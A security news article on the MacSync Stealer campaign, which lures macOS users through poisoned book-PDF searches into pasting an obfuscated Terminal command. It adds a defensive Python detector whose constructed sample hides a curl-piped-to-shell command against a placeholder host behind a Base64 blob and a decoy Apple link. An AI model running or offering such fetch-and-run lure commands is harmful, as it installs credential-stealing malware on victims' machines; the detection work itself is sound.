A sophisticated new macOS malware delivery chain is targeting users through a blend of high-ranking search results and clever social engineering. Researchers at CloudSEK have identified a campaign distributing MacSync Stealer, a potent information-thief designed to strip Apple users of their digital identities and financial assets.
The campaign leverages SEO poisoning to place malicious links at the top of Google search results. Attackers specifically target users looking for free PDF versions of popular professional books, such as “Inspired: How To Create Products Customers Love”.
“The campaign begins with malicious search results targeting users attempting to download PDF versions of popular books,” the researchers explain. When a user clicks the link, they aren’t given a document. Instead, they are redirected to a fake “human verification” page featuring a countdown timer and a button to prove they aren’t a robot.
Once the victim clicks the verification button, they are presented with a macOS-themed instruction page. Under the guise of fixing a “download issue,” the site provides a “Quick Installation” command to be pasted into the Mac Terminal.
This command uses a clever trick: it starts with a legitimate-looking link to apps.apple.com to lower the victim’s guard. However, “the real behavior is hidden inside the Base64-encoded string”. Once executed, this string silently pulls a remote script from attacker-controlled infrastructure and pipes it directly into the system’s command processor.
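As an added defensive illustration (not from the CloudSEK report), the Python heuristic below inspects a shell command line, such as one pulled from zsh history or EDR process telemetry, for the traits described above: a decoy apps.apple.com link, a Base64 blob decoded straight into a shell, and a decoded payload that fetches a remote script. The sample commands and the example.invalid URL are constructed for the example.

```python
import base64
import re

# Detection heuristics for the "paste this into Terminal" lure described above.
# A remote script fetched and fed straight into a shell:
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b")
# A base64 blob decoded and fed straight into a shell (macOS base64 accepts -D or -d):
DECODE_TO_SHELL = re.compile(r"base64\s+(-[dD]|--decode)\b[^|]*\|\s*(ba|z)?sh\b")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_base64_blobs(command: str) -> list[str]:
    """Return every base64 token in the command that decodes to readable text."""
    layers = []
    for blob in BASE64_BLOB.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # URL fragments and random tokens rarely decode cleanly
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            layers.append(text)
    return layers


def analyze_command(command: str) -> dict:
    """Flag one command line; the decoded layers are returned for analyst review."""
    findings = []
    layers = decode_base64_blobs(command)
    if "apps.apple.com" in command and layers:
        findings.append("apple-link decoy followed by base64 blob")
    if DECODE_TO_SHELL.search(command):
        findings.append("base64 blob decoded straight into a shell")
    if PIPE_TO_SHELL.search(command):
        findings.append("remote script piped into a shell")
    for layer in layers:
        if PIPE_TO_SHELL.search(layer):
            findings.append("decoded payload pipes a remote script into a shell")
    return {"suspicious": bool(findings), "findings": findings, "decoded": layers}


# Constructed samples (not the real campaign's command or infrastructure).
HIDDEN = base64.b64encode(b"curl -fsSL https://example.invalid/install.sh | sh").decode()
LURE_COMMAND = f'open "https://apps.apple.com/app/id0000" ; echo "{HIDDEN}" | base64 -d | sh'
BENIGN_COMMAND = "brew install wget"

if __name__ == "__main__":
    for cmd in (LURE_COMMAND, BENIGN_COMMAND):
        print(analyze_command(cmd))
```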
MacSync is a highly efficient “loader” that runs silently in the background. Its primary goal is the total harvest of sensitive data. Within seconds of execution, it begins:
- Stealing Credentials: It targets Chromium-based browsers (Chrome, Brave, Edge, Opera) and Firefox to extract login data, active session cookies, and autofill information.
- Targeting Crypto Wallets: The malware scans for dozens of browser-based wallet extensions and directly copies desktop wallet directories for Exodus, Electrum, Atomic, and more.
- Harvesting System Keys: It reaches deep into the system to grab macOS Keychains, SSH keys, AWS credentials, and Kubernetes configurations.
- Targeted File Grabbing: It automatically searches the Desktop, Documents, and Downloads folders for files with sensitive extensions like .wallet, .key, .seed, and .pem.
To ensure success, the malware even uses a fake system dialog. If it cannot find a saved password, it prompts the user to “enter password to continue” using a window that mimics official System Preferences.
Perhaps the most alarming discovery is the malware’s interest in Ledger Live. If the application is detected on the Mac, the malware downloads attacker-controlled files to replace internal application components like app.asar and Info.plist.
“The additional tampering of cryptocurrency wallet software indicates that the objective extends beyond credential theft toward financial persistence and transaction manipulation,” CloudSEK researchers warned.
In reality, the compromise is already complete.